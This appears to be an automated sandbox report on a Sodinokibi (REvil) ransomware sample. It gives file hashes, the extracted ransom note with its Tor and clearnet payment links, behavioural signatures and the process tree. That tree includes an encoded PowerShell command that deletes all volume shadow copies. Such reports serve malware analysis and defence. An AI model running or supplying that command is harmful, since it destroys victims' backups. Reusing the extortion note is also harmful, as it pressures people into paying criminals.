Analysis

  • max time kernel
    139s
  • max time network
    172s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    30-01-2022 07:38

General

  • Target

    fdd3fe74b561c24b43e02a07bed1e4d7845b318f7ba93233ae9e6c2a4e24fcef.exe

  • Size

    134KB

  • MD5

    759a4afea7d37c25345c45f778bb1cea

  • SHA1

    135205266939b9d243fe6348cb9f3b4ce9d712da

  • SHA256

    fdd3fe74b561c24b43e02a07bed1e4d7845b318f7ba93233ae9e6c2a4e24fcef

  • SHA512

    7b77afd2972aa24160e387eae2c6b378b0ca7c470323347da583d8014ee28501fd2d94b960ebdcb2a2a9b89c0f4541a88c551e6c2662b9698b2f607637718963

Malware Config

Extracted

Path

C:\1y6gl6264-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 1y6gl6264. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AEB5B2A593F0CE4A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/AEB5B2A593F0CE4A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Dh5T/QS9Oy6jrr1+/qtSpfehgGfWvKavlcoGdGAk2LAUIE3B7jDc8CMrag46hCr9 r1ys+q8WGakoT87lfO0Ad5bSlv4NetX0aJnEygRNlb+maJpoTI3rh+40agdakv4c HSevXwe7W52Lcz9M9aThqej7+gOtGmeeT4vxVjRtE6hTj/yW+f+4QK0fBF9+0f6b hP90wL6O2wbg8p5m4mM/2Dk9AmdVMXSh1EJLEI13ajHg7AGpYICkRcVqbtyoGAut l53h/hgeWbliJPAMR0XzMkstOgRCvsM7wVZ/OPG5qsaFbdlIqSwxrZBx92wt+6wL 0v4wljP4gJtO7dijUQTPYfT1zKaOM51xO+XDfgizjvgKv2FJ15hbqHn3VaccTvkl oTRDqAqwKy0egVfpO32yhgjT0sZ1679PTei/jy0uXNpLb8pFQrA8cPI6hGjN4ds6 inShVVRm+xFJfMm7YL8iUN7FE4lg6rUxKzW/raQFCfIHOTe4XeHQIolm2b6+e6ki VQ1z8gvXWfaD+utGJpbIc75e7erMNaXa2punNNugh37jYF0t2hShh4/YjPWDsbzp vRKdUJjIHaG4EpLC34Eg+w/WVJ5k9bG0LRZwLd3C+CjARRE3LU/htFNuEyLIm+Yb X4zyJULHwosfcWpd0xfv6Gcyl2QRzxbMlcQU8d2hnim7xFadLeTfLd79iBfvcJhX 8jIZ4sefGFAYOy5SGiR07F5RUohTNlcg1BXBUpnmrWWV03unplt6RnJ+acmc8r8Q KJ0W1NB7uOKmvNgIuxD4MFaMieteM1K/nFRY8M47Imwu+qMPNqRep/u9DUqkX43m 0P2UEF/KMJ+KqVFiXtAii+az6SX0c5F6Emb4CZDY7oDEGQBNw3euJzaykX+7V1n5 9IyJNlD51tnREDWpzwizZXjsoUV9GpmDc6ws+MMFkJfrs4T54FW3oS57dO8Y9kUU hzyFw0vJOFv0LcS9tjAJo8DzJihR6/Wukv5A3nMpl4ya4Z/APe38Zad31GFWAcip Y8gLxLtJP6ozW0KAWRoHjHMyfxeMIjeC2YwBepsaWd+4nmvZUo6aj7a8H9mSJs0l XMVQSPYmQC/XyWxZWCeNldtjUwf2iXse6I5Q/+itHn9+wj1Lpg2GwZ0A0xq20CGo 4Oep29vbURyylDkxGiiGy4NfA7ipawhNwrLMDMLZLibEEemQRShKs7XeGZFEqJ0v Xe1kM0Uma6Tpej6VXhQNqeQbJi4CHDvJ3+zR81nSVzCQUCPCAv0AOvyyRVDdAVtb Z2Dvc/opbLViRuYyInKjwpYIETmlcd8gieLdVzxG Extension name: 1y6gl6264 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/AEB5B2A593F0CE4A

http://decryptor.cc/AEB5B2A593F0CE4A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 35 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fdd3fe74b561c24b43e02a07bed1e4d7845b318f7ba93233ae9e6c2a4e24fcef.exe
    "C:\Users\Admin\AppData\Local\Temp\fdd3fe74b561c24b43e02a07bed1e4d7845b318f7ba93233ae9e6c2a4e24fcef.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:524
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1748
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1492

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/524-55-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

      Filesize

      8KB

    • memory/524-57-0x0000000002600000-0x0000000002602000-memory.dmp

      Filesize

      8KB

    • memory/524-59-0x0000000002604000-0x0000000002607000-memory.dmp

      Filesize

      12KB

    • memory/524-58-0x0000000002602000-0x0000000002604000-memory.dmp

      Filesize

      8KB

    • memory/524-56-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp

      Filesize

      11.4MB

    • memory/524-60-0x000000001B760000-0x000000001BA5F000-memory.dmp

      Filesize

      3.0MB

    • memory/524-61-0x000000000260B000-0x000000000262A000-memory.dmp

      Filesize

      124KB

    • memory/1888-54-0x0000000075D61000-0x0000000075D63000-memory.dmp

      Filesize

      8KB